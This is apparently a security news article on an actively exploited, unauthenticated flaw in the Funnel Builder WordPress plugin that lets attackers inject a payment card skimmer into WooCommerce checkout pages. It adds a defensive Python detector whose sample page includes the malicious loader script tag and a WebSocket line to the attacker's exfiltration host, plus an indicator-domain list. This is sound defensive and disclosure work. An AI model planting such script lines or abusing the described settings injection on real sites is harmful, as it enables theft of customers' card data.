CVE pending: Funnel Builder WordPress plugin

May 15, 2026 20:02 · 10 min read

Funnel Builder WordPress Plugin Vulnerability

A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript snippets into WooCommerce checkout pages. The flaw, which has not received an official identifier, can be leveraged without authentication and affects all versions of the plugin before 3.15.0.3.

Funnel Builder is a WordPress plugin for WooCommerce checkout developed by FunnelKit. It is primarily used to customize checkout pages and offers features such as one-click upsells and landing pages aimed at improving conversion rates. Based on statistics from WordPress.org, the Funnel Builder plugin is active on more than 40,000 websites.

Exploitation and Malicious Activity

E-commerce security company Sansec detected the malicious activity and noticed that the payload (analytics-reports[.]com/wss/jquery-lib.js) is disguised as a fake Google Tag Manager/Google Analytics script that opens a WebSocket connection to an external location (wss://protect-wss[.]com/ws). The underlying flaw lets an unauthenticated attacker modify the plugin’s global settings through an unprotected, publicly exposed checkout endpoint.

This allows them to inject arbitrary JavaScript into the plugin’s “External Scripts” setting, causing the malicious code to execute on every checkout page. According to Sansec, the attacker-controlled server delivers a customized payment card skimmer that steals credit card numbers, CVVs, billing addresses, and other customer data.

Impact and Consequences

Payment card skimmers enable threat actors to make fraudulent online purchases, while stolen records often end up sold individually or in bulk on dark web portals known as carding markets. The exploitation of this vulnerability can have severe consequences for website owners and their customers, highlighting the importance of keeping plugins up to date and monitoring for suspicious activity.

Vendor Response and Recommendations

FunnelKit addressed the vulnerability in version 3.15.0.3 of Funnel Builder, released on May 14, 2026. A security advisory from the vendor, seen by Sansec, confirms the malicious activity, saying “we identified an issue that allowed bad actors to inject scripts.” The vendor recommends that website owners and administrators prioritize updating to the latest version from the WordPress dashboard and also review Settings > Checkout > External Scripts for potential rogue scripts the attacker may have added.
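The two checks the advisory asks site owners to perform, confirming the installed version is at or above 3.15.0.3 and looking for rogue scripts on checkout pages, can be scripted. The following is an added example written for this article, not code from FunnelKit, Sansec or BleepingComputer. It compares a version string against the fixed release and scans saved checkout-page HTML for the two indicator domains named above (with the "[.]" defanging undone) plus any other WebSocket endpoint, which is flagged for manual review rather than treated as proof of compromise. The sample HTML is constructed for the demonstration; in practice you would feed it the rendered checkout page (for example, saved from a browser or fetched with curl).

```python
import re
from html.parser import HTMLParser

# Indicator domains quoted in the article, with the "[.]" defanging undone so they match.
IOC_DOMAINS = {"analytics-reports.com", "protect-wss.com"}
# Release that FunnelKit says closes the hole; anything older is affected.
FIXED_VERSION = "3.15.0.3"


def is_vulnerable_version(installed: str) -> bool:
    """True when the installed Funnel Builder version is older than FIXED_VERSION.
    Dotted versions are compared component-wise; missing components count as 0,
    so "3.15" is treated as "3.15.0.0"."""
    def parts(v):
        return [int(p) for p in v.strip().split(".")]
    a, b = parts(installed), parts(FIXED_VERSION)
    width = max(len(a), len(b))
    a += [0] * (width - len(a))
    b += [0] * (width - len(b))
    return a < b


class ScriptCollector(HTMLParser):
    """Collects <script src=...> URLs and the bodies of inline <script> blocks."""
    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of each external script tag
        self.inline = []     # text of each inline script block
        self._capturing = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._capturing = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._capturing:
            self.inline.append("".join(self._buf))
            self._capturing = False

    def handle_data(self, data):
        if self._capturing:
            self._buf.append(data)


# Matches http(s):// and ws(s):// URLs and captures the host part.
URL_RE = re.compile(r"\b(?:https?|wss?)://([A-Za-z0-9.-]+)", re.IGNORECASE)


def _matches_ioc(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def find_indicators(page_html: str):
    """Return (reason, where, host) tuples for the scripts on a checkout page.
    'ioc' marks a host on the published indicator list; 'websocket' marks any
    other ws:// or wss:// endpoint, worth a manual look because the reported
    skimmer exfiltrates over WebSocket, but not proof of compromise on its own."""
    parser = ScriptCollector()
    parser.feed(page_html)
    findings = []
    sources = [("src", s) for s in parser.external] + [("inline", b) for b in parser.inline]
    for where, text in sources:
        for m in URL_RE.finditer(text):
            host = m.group(1).lower()
            scheme = m.group(0).split("://")[0].lower()
            if _matches_ioc(host):
                findings.append(("ioc", where, host))
            elif scheme in ("ws", "wss"):
                findings.append(("websocket", where, host))
    return findings


# Constructed sample page: a legitimate tag-manager include, the injected loader,
# its WebSocket exfiltration endpoint, and an unrelated WebSocket used by a chat widget.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE"></script>
<script src="https://analytics-reports.com/wss/jquery-lib.js"></script>
<script>
  var s = new WebSocket("wss://protect-wss.com/ws");
</script>
<script>
  var live = new WebSocket("wss://chat.example.net/socket");
</script>
</head><body>checkout</body></html>
"""

if __name__ == "__main__":
    print("plugin 3.15.0.2 vulnerable:", is_vulnerable_version("3.15.0.2"))
    for reason, where, host in find_indicators(SAMPLE_CHECKOUT_HTML):
        print(f"{reason:9s} {where:6s} {host}")
```

Run it against the real checkout page rather than the sample, and treat any 'ioc' hit as a confirmed injection to remove from Settings > Checkout > External Scripts; 'websocket' hits need a human to decide whether the endpoint belongs to a legitimate service.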

It is essential for website owners and administrators to take immediate action to protect their customers and prevent further exploitation. By updating to the latest version of the Funnel Builder plugin and monitoring for suspicious activity, they can help prevent the theft of sensitive customer information and reduce the risk of fraudulent online purchases.

Prevention and Best Practices

To prevent similar vulnerabilities from being exploited in the future, website owners and administrators should prioritize keeping their plugins and themes up to date, monitoring for suspicious activity, and implementing robust security measures. This includes using strong passwords, enabling two-factor authentication, and regularly reviewing settings and configurations for potential vulnerabilities.

By taking these steps, website owners and administrators can help protect their customers and prevent the exploitation of vulnerabilities like the one found in the Funnel Builder plugin. It is crucial to stay vigilant and proactive in maintaining the security and integrity of online platforms, especially those that handle sensitive customer information.


Source: BleepingComputer